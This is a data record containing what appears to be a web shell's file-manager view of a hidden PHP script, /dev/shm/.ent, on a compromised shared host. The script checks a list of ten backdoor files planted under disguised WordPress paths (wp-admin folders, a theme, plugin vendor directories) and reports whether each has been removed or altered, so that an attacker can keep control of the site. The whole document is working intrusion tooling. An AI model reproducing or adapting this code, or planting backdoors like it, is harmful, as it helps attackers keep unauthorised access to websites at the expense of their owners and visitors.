{'id': 183207, 'code': 'Y2gQopBX HEX
HEX
Server: LiteSpeed
System: Linux premium241.web-hosting.com 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User: aurelytl (1710)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: //dev/shm/.ent
<?php   $r = '/home/pickqupd/public_html'; $x = ["/.well-known/pki-validation/714097/FAQ.php"=>"bd@@144915@@1668",
"/wp-admin/user/contribute.php"=>"bd@@80661@@settings",
"/wp-admin/images/lib_zip.php"=>"bd@@97563@@1782",
"/wp-admin/user/user-edit.php"=>"bd@@132150@@event_handler",
"/wp-admin/maint/checkbox.php"=>"bd@@143179@@1675",
"/wp-admin/network/theme.php"=>"bd@@145814@@1518",
"/wp-content/themes/flixita/index.php"=>"bd@@129180@@query_handler",
"/wp-admin/css/mod_stats.php"=>"bd@@81391@@636",
"/wp-content/plugins/dokan-lite/assets/images/vendor-capability/rindex.php"=>"bd@@81393@@562",
"/wp-content/plugins/google-listings-and-ads/vendor/phpseclib/bcmath_compat/lib/Bindex.php"=>"bd@@115962@@1546"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');